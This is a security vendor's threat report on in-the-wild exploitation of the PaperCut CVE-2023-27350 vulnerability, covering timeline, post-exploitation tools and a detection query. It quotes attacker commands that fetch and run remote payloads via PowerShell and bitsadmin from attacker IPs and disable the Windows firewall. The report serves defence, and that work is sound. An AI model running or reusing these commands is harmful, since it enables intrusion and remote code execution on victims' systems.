Last updated 2023-08-07 15:30:00 Added new CVE information
Updated 2023-05-02 08:45:00: Added “Timeline and Further Sophos Resources” section
2023-04-26 17:50:00: First publication
Sophos X-Ops MDR and SophosLabs teams have been monitoring and researching activity around the PaperCut vulnerability CVE-2023-27350 since April 13, 2023. In this posting we outline our observations on the threat environment around this vulnerability.
On April 19, 2023, software company PaperCut published an update to their advisory indicating exploitation of CVE-2023-27350 has been reported in the wild. PaperCut offers multi-platform print management software, popular in the education sector. The vulnerability leveraged in the attack was in fact already addressed by a patch released the month prior – a situation commonly called an n-day attack.
This vulnerability affects PaperCut MF and NG Application and Site Servers version 8.0 and above across all supported operating systems. A patch was made available on March 8 and Sophos recommends that you apply it at the earliest opportunity on all vulnerable servers.
Sophos’ earliest observation of an affected user occurred on April 13. That attack was identified by a SophosLabs threat researcher when Cobalt Strike was detected during post-exploitation activity. On April 17 — four days later and two days prior to the public announcement — Sophos MDR detected exploitation of a vulnerable PaperCut server at a customer in North America. We quickly contained the affected server and engaged the customer to proceed with remediation.
To date, we have observed multiple threat groups target potential victims globally, with an overweight percentage in the educational sector.
On July 25. 2023, an additional vulnerability was reported to PaperCut by researchers. That vulnerability, CVE-2023-39143, affects PaperCut NG/MF running on Windows, prior to version 22.1.3, and could result in the reading and writing of arbitrary files to the PaperCut server via two separate path traversal techniques–meaning that if a server was exposed to the Internet directly, bad actors could potentially both access data shared on the server and write malicious files (such as web shells) to the server. A fix is available for PaperCut versions 22.1.3 or later on Windows, but all previous versions remain vulnerable. Sophos has not yet seen any exploitation of this vulnerability, but recommends the application of the patch as early as possible to avoid potential exploitation.
The vulnerability details provided by Trend Micro’s ZDI indicate that the code allowing authentication bypass and remote code execution is found in the SetupCompleted Java class. At the time of exploitation, Sophos MDR observed the following error log being generated:
Figure 1: Error messages are an early sign that something is amiss
Post-exploitation activity often results in PowerShell commands being executed by the pc-app.exe parent process, as seen in Figure 2 downloading Atera remote monitoring software to the victim. (Atera is of course legitimate software, seen in this situation being abused by the attackers.).
Figure 2: PowerShell download of legitimate-but-abused Atera software
This is just one example observed, as different threat groups execute PowerShell in a variety of ways.
powershell IEX ((New-Object Net.WebClient).DownloadString ('http://137.184.56[.]77:443/for.ps1')) powershell.exe Invoke-WebRequest http://18.104.22.168:443/c.bat -OutFile c.bat powershell $url="https://tmpfiles[.]org/dl/1337855/enc.txt" $dst="C:\encexe" netsh advfirewall set allprofiles state off Invoke-WebRequest $url -OutFile $dst Start-Process $dst -windowstyle hidden Start-Sleep -s 10
Sophos MDR has also observed the use of BITSAdmin, a commonly abused LOLBin, to download additional tools.
bitsadmin /transfer dwa /download /priority FOREGROUND http[:]//23.184.48[.]17/bootcamp.zip C:\ProgramData\bootcamp.zip bitsadmin /transfer mydownloadjob /download /priority normal http[:]//192.184.35[.]216:443/4591187629.exe %WINDIR%setup2.exe
The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of AnyDesk, Atera, Synchro, TightVNC, NetSupport, and DWAgent remote management tools across multiple campaigns.
Additionally, some of the final payloads overlap with previously reported threats such as Truebot (downloader, often linked to Cl0p ransomware), Buhti (ransomware), MoneroOcean (coinminer), and Mirai (botnet). One such example of a miner, shown in Figure 3, details the commands to kill other miners before launching their own Monero (XMR) mining software.
Figure 3: Miner-on-miner violence
Determining impact with Sophos XDR
Upon receiving updated threat intelligence, Sophos MDR threat hunters immediately started searching across our customer base for any additional affected users. The following SQL query can be used by Sophos XDR customers in their Sophos Central console to identify any suspicious activity, as well as be converted into a Sigma rule for non-Sophos customers. Generally, command-line executions performing system discovery with native tools (LOLBins) such as whoami, nltest, and systeminfo can indicate compromise and lead to the point of initial access. If suspicious commands are observed, it is recommended to perform system isolation while the system is under investigation. Note that a common false positive observed in the process activity was the PaperCut print archive function.
SELECT date_format(from_unixtime(TIME,'%Y-%m-%d %H:%i:%s') AS date_time, customer_id, meta_hostname, parent_name, parent_cmdline, name, cmdline, sophos_pid FROM xdr_data WHERE AND query_name = 'running_processes_windows_sophos' AND LOWER(parent_name) = 'pc-app.exe' AND (LOWER(name) = 'cmd.exe' OR LOWER(name) = 'powershell.exe')
As noted above, a patch is available; this situation falls into the category of attacks known as “n-days” – an exploit that appears very soon after a patch is issued. Potentially affected users are encouraged to review and apply the patch as soon as possible. Our GitHub includes a set of Indicators of Compromise associated with this attack campaign. Sophos Labs continues to monitor the situation closely for potential AV detections.
Timeline and Further Sophos Resources
As our investigation continues, we’ve developed a (simplified) timeline of PaperCut-related events as they unfolded in our data. In addition, there’s more information about PaperCut on the Naked Security blog (which includes a tidy checklist for PaperCut customers) and the Naked Security podcast.
Benjamin Sollman, Colin Cowie, Greg Iddon, and Gabor Szappanos contributed to this report.